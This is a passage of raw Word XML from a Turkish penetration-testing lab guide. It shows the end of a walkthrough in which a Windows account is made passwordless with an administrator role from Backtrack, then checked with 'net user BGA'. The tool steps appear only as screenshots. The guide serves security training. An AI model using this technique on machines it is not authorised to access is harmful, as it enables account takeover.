          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="475B82B7" wp14:editId="1CB2874A">
            <wp:extent cx="3605530" cy="1302385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="162" name="Resim 162" descr="https://lh6.googleusercontent.com/bdaJLvYQpcn-EoqyP9TgpQ7ufElsI4w6bgximEKPZYmFPO2t4AL1g1FTL9oJ7o6iPZTmqvHVcyWcRriakBQZlRaOB0HyZRnN4N45kkLzav0mgl8rkI4EFsM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daJLvYQpcn-EoqyP9TgpQ7ufElsI4w6bgximEKPZYmFPO2t4AL1g1FTL9oJ7o6iPZTmqvHVcyWcRriakBQZlRaOB0HyZRnN4N45kkLzav0mgl8rkI4EFsMb_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530" cy="1302385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB87499" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5DD35F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3 seçildiğinde aşağıdaki gibi bir sonuç çıkar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6082A96B" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07FCEF70" wp14:editId="0D7A4F17">
            <wp:extent cx="5693410" cy="2760345"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="163" name="Resim 163" descr="https://lh4.googleusercontent.com/eBCTkbQte__J33SYMNSj8DyGXTWHn-6eORIzQknJRrlMlPAcz56aZIv-PXv3jLeSWrTWBiTAl2ZK75K7eHStVYns1orxVBaZh_85RcxSGYv-keeEWksoU_Bf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eBCTkbQte__J33SYMNSj8DyGXTWHn-6eORIzQknJRrlMlPAcz56aZIv-PXv3jLeSWrTWBiTAl2ZK75K7eHStVYns1orxVBaZh_85RcxSGYv-keeEWksoU_Bf4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3410" cy="2760345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAA59C5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1542A3A0" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ardından Backtrack kapatılıp, bilgisayar Windows sistemle başladığında BGA hesabına parolasız olarak giriş yapılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388BE86C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2838F010" wp14:editId="2B5E4CF6">
            <wp:extent cx="5339715" cy="1475105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="164" name="Resim 164" descr="https://lh4.googleusercontent.com/2gax6Si3orbHQfRiX-2Ho85SU2FwsxpPvF4utHVXKTUZnPQ4IBPzscXjejA3OeLyidwLVU8Pgwhr9O468OwoNFKQhP3oKMq5nhNDhpVKlLQ4LGcj7K19WK39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gax6Si3orbHQfRiX-2Ho85SU2FwsxpPvF4utHVXKTUZnPQ4IBPzscXjejA3OeLyidwLVU8Pgwhr9O468OwoNFKQhP3oKMq5nhNDhpVKlLQ4LGcj7K19WK39u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715" cy="1475105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A605305" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows komut satırında </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5DD437" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&gt;net user BGA</w:t>
      </w:r>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A2FCF4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065394F">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>yazarak veya Denetim Masası/Kullanıcı Hesapları altından BGA hesabının artık yönetici yetkisine sahip olduğu görülebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CECE3E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="0065394F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2736EEA5" w14:textId="3AA7FE9E" w:rsidR="00F673D6" w:rsidRPr="00053A9F" w:rsidRDefault="00E06D00" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Not: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E06D00">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu doküman BGA Bilgi Güvenliği A.Ş için </w:t>
      </w:r>
      <w:r w:rsidR="00F673D6" w:rsidRPr="00E06D00">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mesut Türk </w:t>
      </w:r>
      <w:r w:rsidRPr="00E06D00">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tarafından hazırlanmıştır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E06D00">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F673D6" w:rsidRPr="00053A9F" w:rsidSect="00C95C1C">
      <w:headerReference w:type="default" r:id="rId47"/>
      <w:footerReference w:type="default" r:id="rId48"/>
      <w:footerReference w:type="first" r:id="rId49"/>
      <w:pgSz w:w="12240" w:h="15840"/>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5755" w14:textId="77777777" w:rsidR="004C4AF5" w:rsidRDefault="004C4AF5" w:rsidP="00C656DC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2C3D3396" w14:textId="77777777" w:rsidR="004C4AF5" w:rsidRDefault="004C4AF5" w:rsidP="00C65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B38B" w14:textId="2D078C01" w:rsidR="00397BDB" w:rsidRPr="004B36CC" w:rsidRDefault="004B36CC" w:rsidP="00C656DC">
    <w:pPr>
      <w:pStyle w:val="AltBilgi"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="004B36CC">
      <w:rPr>
        <w:rFonts w:ascii="Helvetica Neue" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
        <w:color w:val="2D2A28"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="28"/>
        <w:lang w:eastAsia="en-US"/>
      </w:rPr>
      <w:t>BGA Bilgi Güvenliği A.Ş. | www.bga.com.tr | @bgasecur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25947"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:p w14:paraId="3AD8A2C2" w14:textId="77777777" w:rsidR="00397BDB" w:rsidRDefault="00397BDB">
        <w:pPr>
          <w:pStyle w:val="AltBilgi"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>287</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="23E8CE09" w14:textId="77777777" w:rsidR="00397BDB" w:rsidRDefault="00397BDB">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814E" w14:textId="77777777" w:rsidR="004C4AF5" w:rsidRDefault="004C4AF5" w:rsidP="00C656DC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F3A5C7F" w14:textId="77777777" w:rsidR="004C4AF5" w:rsidRDefault="004C4AF5" w:rsidP="00C656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8EFD" w14:textId="3992FC8D" w:rsidR="00397BDB" w:rsidRPr="004B36CC" w:rsidRDefault="004B36CC" w:rsidP="00C656DC">
    <w:pPr>
      <w:pStyle w:val="stBilgi"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t>[</w:t>
    </w:r>
    <w:r w:rsidR="00397BDB" w:rsidRPr="004B36CC">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:t>PENTEST LAB ÇALIŞMALARI</w:t>
    </w:r>
    <w:r>
      <w:rPr>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A19"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="542EEB68"/>
    <w:lvl w:ilvl="0" w:tplc="56440656">
      <w:start w:val="2"/>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BB5B44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1FE819A"/>
    <w:lvl w:ilvl="0" w:tplc="AF606922">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7D7D7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E449996"/>
    <w:lvl w:ilvl="0" w:tplc="3C66A0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060265"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0E6289E"/>
    <w:lvl w:ilvl="0" w:tplc="8CD67254">
      <w:start w:val="1"/>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B911C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1604160C"/>
    <w:lvl w:ilvl="0" w:tplc="F3CA1F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A31385"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6898FFC6"/>
    <w:lvl w:ilvl="0" w:tplc="BA9EC322">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132E09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07E4F2CA"/>
    <w:lvl w:ilvl="0" w:tplc="4D2ADA22">
      <w:start w:val="1"/>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908572B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D78A48AE"/>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F5"/>
    <w:rsid w:val="0002222C"/>
    <w:rsid w:val="00033E92"/>
    <w:rsid w:val="00046621"/>
    <w:rsid w:val="0004796A"/>
    <w:rsid w:val="00053A9F"/>
    <w:rsid w:val="0008311D"/>
    <w:rsid w:val="000A1B28"/>
    <w:rsid w:val="000B1F16"/>
    <w:rsid w:val="000B6433"/>
    <w:rsid w:val="000B696F"/>
    <w:rsid w:val="000C1A94"/>
    <w:rsid w:val="000E2E3D"/>
    <w:rsid w:val="000E340F"/>
    <w:rsid w:val="000F3900"/>
    <w:rsid w:val="000F76E6"/>
    <w:rsid w:val="00100BCD"/>
    <w:rsid w:val="00147513"/>
    <w:rsid w:val="001512F1"/>
    <w:rsid w:val="00153437"/>
    <w:rsid w:val="001539D1"/>
    <w:rsid w:val="00153F6C"/>
    <w:rsid w:val="00172873"/>
    <w:rsid w:val="001C67AD"/>
    <w:rsid w:val="001D3298"/>
    <w:rsid w:val="001F2DFC"/>
    <w:rsid w:val="0020362A"/>
    <w:rsid w:val="00212A3D"/>
    <w:rsid w:val="0024660D"/>
    <w:rsid w:val="00252CA4"/>
    <w:rsid w:val="00290832"/>
    <w:rsid w:val="0029284D"/>
    <w:rsid w:val="00295F93"/>
    <w:rsid w:val="002D2659"/>
    <w:rsid w:val="00307A7A"/>
    <w:rsid w:val="003146CE"/>
    <w:rsid w:val="00317EE0"/>
    <w:rsid w:val="0035066C"/>
    <w:rsid w:val="0035531C"/>
    <w:rsid w:val="00355464"/>
    <w:rsid w:val="003916AD"/>
    <w:rsid w:val="00392127"/>
    <w:rsid w:val="00397BDB"/>
    <w:rsid w:val="00397ED4"/>
    <w:rsid w:val="003B0F73"/>
    <w:rsid w:val="003C37E2"/>
    <w:rsid w:val="003D59DA"/>
    <w:rsid w:val="003F3D70"/>
    <w:rsid w:val="00412F8E"/>
    <w:rsid w:val="00413B85"/>
    <w:rsid w:val="00417562"/>
    <w:rsid w:val="00420813"/>
    <w:rsid w:val="00452E01"/>
    <w:rsid w:val="00454907"/>
    <w:rsid w:val="00455352"/>
    <w:rsid w:val="00470445"/>
    <w:rsid w:val="0048231B"/>
    <w:rsid w:val="00482C50"/>
    <w:rsid w:val="004A1A7D"/>
    <w:rsid w:val="004B36CC"/>
    <w:rsid w:val="004B598F"/>
    <w:rsid w:val="004C4AF5"/>
    <w:rsid w:val="004D3AAE"/>
    <w:rsid w:val="004F348D"/>
    <w:rsid w:val="004F4350"/>
    <w:rsid w:val="00513C0D"/>
    <w:rsid w:val="0053541D"/>
    <w:rsid w:val="00540B56"/>
    <w:rsid w:val="00556A87"/>
    <w:rsid w:val="00570D53"/>
    <w:rsid w:val="00575B6B"/>
    <w:rsid w:val="005769EE"/>
    <w:rsid w:val="005E5C61"/>
    <w:rsid w:val="00605456"/>
    <w:rsid w:val="0062090E"/>
    <w:rsid w:val="00623436"/>
    <w:rsid w:val="00625F29"/>
    <w:rsid w:val="00634A03"/>
    <w:rsid w:val="00640FF3"/>
    <w:rsid w:val="0065394F"/>
    <w:rsid w:val="00664BC3"/>
    <w:rsid w:val="00692423"/>
    <w:rsid w:val="00692DFC"/>
    <w:rsid w:val="0069334C"/>
    <w:rsid w:val="006A5DD9"/>
    <w:rsid w:val="006A7CE0"/>
    <w:rsid w:val="006B5716"/>
    <w:rsid w:val="006E6948"/>
    <w:rsid w:val="006F2590"/>
    <w:rsid w:val="0071032A"/>
    <w:rsid w:val="00734133"/>
    <w:rsid w:val="0073564C"/>
    <w:rsid w:val="007401CF"/>
    <w:rsid w:val="00740DF8"/>
    <w:rsid w:val="00747706"/>
    <w:rsid w:val="00750CB4"/>
    <w:rsid w:val="00752862"/>
    <w:rsid w:val="00753685"/>
    <w:rsid w:val="00765A81"/>
    <w:rsid w:val="0076669F"/>
    <w:rsid w:val="00766E67"/>
    <w:rsid w:val="007766C0"/>
    <w:rsid w:val="007815BF"/>
    <w:rsid w:val="00783838"/>
    <w:rsid w:val="00784480"/>
    <w:rsid w:val="00791AEF"/>
    <w:rsid w:val="00796065"/>
    <w:rsid w:val="007970FA"/>
    <w:rsid w:val="007B2148"/>
    <w:rsid w:val="007C62E8"/>
    <w:rsid w:val="007D14C7"/>
    <w:rsid w:val="007E4478"/>
    <w:rsid w:val="00805187"/>
    <w:rsid w:val="00810DDD"/>
    <w:rsid w:val="008179DE"/>
    <w:rsid w:val="008326CB"/>
    <w:rsid w:val="008374EE"/>
    <w:rsid w:val="0084072D"/>
    <w:rsid w:val="00842D7A"/>
    <w:rsid w:val="00846846"/>
    <w:rsid w:val="00851D0C"/>
    <w:rsid w:val="0085314E"/>
    <w:rsid w:val="00853C61"/>
    <w:rsid w:val="00860D30"/>
    <w:rsid w:val="00881EAB"/>
    <w:rsid w:val="00883899"/>
    <w:rsid w:val="008854FC"/>
    <w:rsid w:val="0088700D"/>
    <w:rsid w:val="008A1414"/>
    <w:rsid w:val="008B7DAC"/>
    <w:rsid w:val="008C04D7"/>
    <w:rsid w:val="008E7C49"/>
    <w:rsid w:val="00902B70"/>
    <w:rsid w:val="00911FE8"/>
    <w:rsid w:val="00925082"/>
    <w:rsid w:val="009329AC"/>
    <w:rsid w:val="00945AEE"/>
    <w:rsid w:val="00951C88"/>
    <w:rsid w:val="00952D45"/>
    <w:rsid w:val="00963A2C"/>
    <w:rsid w:val="009647E5"/>
    <w:rsid w:val="00966C78"/>
    <w:rsid w:val="00976389"/>
    <w:rsid w:val="009763B0"/>
    <w:rsid w:val="009825A8"/>
    <w:rsid w:val="00996979"/>
    <w:rsid w:val="00996EAD"/>
    <w:rsid w:val="00997BFB"/>
    <w:rsid w:val="009A3059"/>
    <w:rsid w:val="009A38D1"/>
    <w:rsid w:val="009A7C07"/>
    <w:rsid w:val="009B0655"/>
    <w:rsid w:val="009B14C3"/>
    <w:rsid w:val="009E788D"/>
    <w:rsid w:val="009F2B6B"/>
    <w:rsid w:val="009F5AC6"/>
    <w:rsid w:val="009F649F"/>
    <w:rsid w:val="00A034B0"/>
    <w:rsid w:val="00A11D26"/>
    <w:rsid w:val="00A17C6D"/>
    <w:rsid w:val="00A46C2F"/>
    <w:rsid w:val="00A96A51"/>
    <w:rsid w:val="00A96A6C"/>
    <w:rsid w:val="00AA066A"/>
    <w:rsid w:val="00AC4335"/>
    <w:rsid w:val="00AD00F1"/>
    <w:rsid w:val="00AD5CF5"/>
    <w:rsid w:val="00AE3CA0"/>
    <w:rsid w:val="00AF7E7D"/>
    <w:rsid w:val="00B16823"/>
    <w:rsid w:val="00B22CC6"/>
    <w:rsid w:val="00B25A1D"/>
    <w:rsid w:val="00B3628B"/>
    <w:rsid w:val="00B4390E"/>
    <w:rsid w:val="00B51D4A"/>
    <w:rsid w:val="00B80ECF"/>
    <w:rsid w:val="00B81066"/>
    <w:rsid w:val="00BA05A2"/>
    <w:rsid w:val="00BB7D68"/>
    <w:rsid w:val="00BD7015"/>
    <w:rsid w:val="00BF01F5"/>
    <w:rsid w:val="00C138D6"/>
    <w:rsid w:val="00C152A1"/>
    <w:rsid w:val="00C37FB0"/>
    <w:rsid w:val="00C41182"/>
    <w:rsid w:val="00C42003"/>
    <w:rsid w:val="00C4288D"/>
    <w:rsid w:val="00C50E13"/>
    <w:rsid w:val="00C656DC"/>
    <w:rsid w:val="00C73317"/>
    <w:rsid w:val="00C773E6"/>
    <w:rsid w:val="00C83A81"/>
    <w:rsid w:val="00C87288"/>
    <w:rsid w:val="00C87998"/>
    <w:rsid w:val="00C9149A"/>
    <w:rsid w:val="00C95C1C"/>
    <w:rsid w:val="00C9691C"/>
    <w:rsid w:val="00CA223A"/>
    <w:rsid w:val="00CD5D74"/>
    <w:rsid w:val="00CD787C"/>
    <w:rsid w:val="00CE4B73"/>
    <w:rsid w:val="00CE53E1"/>
    <w:rsid w:val="00D00B55"/>
    <w:rsid w:val="00D02292"/>
    <w:rsid w:val="00D0795F"/>
    <w:rsid w:val="00D102CE"/>
    <w:rsid w:val="00D1034B"/>
    <w:rsid w:val="00D106A4"/>
    <w:rsid w:val="00D2110F"/>
    <w:rsid w:val="00D22534"/>
    <w:rsid w:val="00D2551E"/>
    <w:rsid w:val="00D3291B"/>
    <w:rsid w:val="00D4703E"/>
    <w:rsid w:val="00D71B55"/>
    <w:rsid w:val="00D848DB"/>
    <w:rsid w:val="00DA4D8C"/>
    <w:rsid w:val="00DA7CA2"/>
    <w:rsid w:val="00DC3982"/>
    <w:rsid w:val="00DC70E8"/>
    <w:rsid w:val="00DC72DA"/>
    <w:rsid w:val="00DD223C"/>
    <w:rsid w:val="00DD5E50"/>
    <w:rsid w:val="00DE19A4"/>
    <w:rsid w:val="00E06D00"/>
    <w:rsid w:val="00E07116"/>
    <w:rsid w:val="00E32884"/>
    <w:rsid w:val="00E4143C"/>
    <w:rsid w:val="00E466CB"/>
    <w:rsid w:val="00EA22F8"/>
    <w:rsid w:val="00EB7FCA"/>
    <w:rsid w:val="00EF186A"/>
    <w:rsid w:val="00EF36AF"/>
    <w:rsid w:val="00EF5E7B"/>
    <w:rsid w:val="00F079C3"/>
    <w:rsid w:val="00F201BC"/>
    <w:rsid w:val="00F673D6"/>
    <w:rsid w:val="00F7290A"/>
    <w:rsid w:val="00FD67A7"/>
    <w:rsid w:val="00FF56B5"/>
    <w:rsid w:val="00FF7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74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FF3"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Balk1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Balk1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00997B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147513"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Balk3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Balk3Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E466C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D70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rsid w:val="00C9149A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="200"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:i/>
      <w:color w:val="666666"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AltyazChar">
    <w:name w:val="Altyazı Char"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:link w:val="Altyaz"/>
    <w:rsid w:val="00C9149A"/>
    <w:rPr>
      <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
      <w:i/>
      <w:color w:val="666666"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListeParagraf">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00997BFB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Balk1Char">
    <w:name w:val="Başlık 1 Char"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:link w:val="Balk1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00997BFB"/>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9242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9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Balk3"/>
    <w:link w:val="Stil1Char"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00E466CB"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="280" w:after="80"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Stil1Char">
    <w:name w:val="Stil1 Char"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:link w:val="Stil1"/>
    <w:rsid w:val="00E466CB"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Balk3Char">
    <w:name w:val="Başlık 3 Char"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:link w:val="Balk3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00E466CB"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F4D78" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Kpr">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E466CB"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Balk4Char">
    <w:name w:val="Başlık 4 Char"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:link w:val="Balk4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00BD7015"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="tr-TR"/>
